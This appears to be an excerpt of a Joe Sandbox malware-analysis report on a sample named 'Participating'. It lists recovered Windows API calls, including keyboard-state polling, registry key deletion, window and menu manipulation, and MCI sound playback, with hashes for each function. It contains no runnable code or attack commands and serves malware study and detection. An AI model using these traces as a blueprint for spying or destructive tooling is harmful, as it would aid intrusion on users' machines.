                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00D453B2
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00D453EB
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00D45445
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00D45477
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D454EF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                  • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                  • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                  • Opcode ID: 8ed7cdfac122f2212433ae6704b9dc01010ad51e6461e7ae248136e28245c231
                                                                                                                                                                                                                                                                  • Instruction ID: d2da0c35aa87c7d93183cf8d94660707c54a664ff4025e7c810344acea664038
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed7cdfac122f2212433ae6704b9dc01010ad51e6461e7ae248136e28245c231
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91910871104B06AFDB04DF24E894BBAB7B9FF01304F184519FA8A82196EB31ED55CBB1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D797B6
                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00D797C6
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00D797D1
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00D79879
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D7992B
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00D79948
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00D79958
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D7998A
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D799CC
                                                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D799FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: fe862c4e3acf8b29a2120b32423735f7e3431c2e01fac2edc078088ad2da2c7b
                                                                                                                                                                                                                                                                  • Instruction ID: d5934e4eea47836c7daebb299d5038a1405551d155644b0d71510fab2a695d56
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe862c4e3acf8b29a2120b32423735f7e3431c2e01fac2edc078088ad2da2c7b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA819C725083419FD710CF25D895AABBBE9FF89314F08891DF98997291EB30D905CBB2
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(00DB29C0,000000FF,00000000,00000030), ref: 00D4C973
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(00DB29C0,00000004,00000000,00000030), ref: 00D4C9A8
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00D4C9BA
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00D4CA00
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00D4CA1D
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00D4CA49
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00D4CA90
                                                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D4CAD6
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D4CAEB
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D4CB0C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                   • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 1460738036-4108050209
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00D4E4D4
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00D4E4FA
• _wcslen.LIBCMT ref: 00D4E504
• _wcsstr.LIBVCRUNTIME ref: 00D4E554
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00D4E570
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 1939486746-1459072770
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D6D6C4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00D6D6ED
• FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D6D7A8
  • Part of subcall function 00D6D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00D6D70A
  • Part of subcall function 00D6D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00D6D71D
  • Part of subcall function 00D6D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D6D72F
  • Part of subcall function 00D6D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D6D765
  • Part of subcall function 00D6D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D6D788
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00D6D753
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2734957052-4033151799
APIs
• timeGetTime.WINMM ref: 00D4EFCB
  • Part of subcall function 00CFF215: timeGetTime.WINMM(?,?,00D4EFEB), ref: 00CFF219
• Sleep.KERNEL32(0000000A), ref: 00D4EFF8
• EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00D4F01C
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D4F03E
• SetActiveWindow.USER32 ref: 00D4F05D
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D4F06B
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00D4F08A
• Sleep.KERNEL32(000000FA), ref: 00D4F095
• IsWindow.USER32 ref: 00D4F0A1
• EndDialog.USER32(00000000), ref: 00D4F0B2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
• String ID: BUTTON
• API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D4F374
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D4F38A
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D4F39B
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D4F3AD
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D4F3BE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                  • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                  • Opcode ID: e8487a49a332a1844c816dccb7bebab2935f367ca5ee01e382e7ce954212e51a
                                                                                                                                                                                                                                                                  • Instruction ID: 683227e8df9d5f6106796022e9a004c705d1e84a5694778d6fe20a45b34829b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8487a49a332a1844c816dccb7bebab2935f367ca5ee01e382e7ce954212e51a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01118632A502997ED720A766CC4AEFF7A7CEFD2B40F40042AB401E20E1DAA05D49C9B1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4A9D9
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00D4AA44
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00D4AA64
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00D4AA7B
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00D4AAAA
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00D4AABB
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00D4AAE7
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00D4AAF5
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00D4AB1E
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00D4AB2C
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00D4AB55
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00D4AB63
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4bd9cbb996e281c29f3153f47ff2814b719adcbf6866adb4e91e17d0154371d4
                                                                                                                                                                                                                                                                  • Instruction ID: 92fcd0418d14501ec0e2d78d21d2ee77af9bc5010a239bba9c58627b0b8bbbed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bd9cbb996e281c29f3153f47ff2814b719adcbf6866adb4e91e17d0154371d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC51E560A447842BFB35D7788851BEABFB59F12380F4C459EC5C25A1C2DA649B8CCB73
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00D46649
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D46662
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00D466C0
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00D466D0
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D466E2
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00D46736
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00D46744
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D46756
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00D46798
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00D467AB
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D467C1
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00D467CE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                  • Opcode ID: e1f5f4059bc9c53ba51e12e8e8a731b7fe66219de3bdd82e88f337ecf27d4bb3
                                                                                                                                                                                                                                                                  • Instruction ID: 2010076494fb5786a1ad2913792900f0ad885d14479872c7b7ccce05db746560
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1f5f4059bc9c53ba51e12e8e8a731b7fe66219de3bdd82e88f337ecf27d4bb3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 205120B1A00309AFDF18CF68CD85AAE7BB6FF48314F148129F51AE6290D770ED448B60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CE1488,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00CE1865
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00CE1521
                                                                                                                                                                                                                                                                  • KillTimer.USER32(00000000,?,?,?,?,00CE145A,00000000,?), ref: 00CE15BB
                                                                                                                                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00D229B4
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00D229E2
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00D229F9
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CE145A,00000000), ref: 00D22A15
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D22A27
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 641708696-0
                                                                                                                                                                                                                                                                  • Opcode ID: c063c7804c5d00a54e3c55bc74c461ff6158560b948b39ac6ee8ebed7f7075a8
                                                                                                                                                                                                                                                                  • Instruction ID: b33ab44023c58782b8319b741dfc77da94c7279f71be293ea899c3b0aa965a6c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c063c7804c5d00a54e3c55bc74c461ff6158560b948b39ac6ee8ebed7f7075a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A9619D31501751EFDB368F16D848B3A77B1FF90316F185118E89B86AA0C330A9A0DF60
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE2234: GetWindowLongW.USER32(?,000000EB), ref: 00CE2242
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00CE2152
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                                                                                                                                  • Opcode ID: 947f6013d14f4f30d502c0e77b946a50a6f04ea3f3666d8169bc3514fd8259f3
                                                                                                                                                                                                                                                                  • Instruction ID: 9441b6a2f7d08a1e5b0deb7bf4340d88f9535c66e24d2c17c0c9822ed040f60f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 947f6013d14f4f30d502c0e77b946a50a6f04ea3f3666d8169bc3514fd8259f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F441BE31100790EFDB245F299C48BBD377AAB52325F584245EAB68B2E1D7318E82DB20
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00D30D31,00000001,0000138C,00000001,00000000,00000001,?,00D5EEAE,00DB2430), ref: 00D4A091
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00D30D31,00000001), ref: 00D4A09A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00D30D31,00000001,0000138C,00000001,00000000,00000001,?,00D5EEAE,00DB2430,?), ref: 00D4A0BC
                                                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,00D30D31,00000001), ref: 00D4A0BF
                                                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D4A1E0
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message_wcslen
                                                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                  • API String ID: 747408836-2268648507
                                                                                                                                                                                                                                                                  • Opcode ID: 85f3864aa8da54ff9d9390a181546f62feadfbe1d06c6934fc56889a526aefab
                                                                                                                                                                                                                                                                  • Instruction ID: 677e70838600da6c63b7dac3ec702b19eb60910751f757113ce5966937af9ebb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85f3864aa8da54ff9d9390a181546f62feadfbe1d06c6934fc56889a526aefab
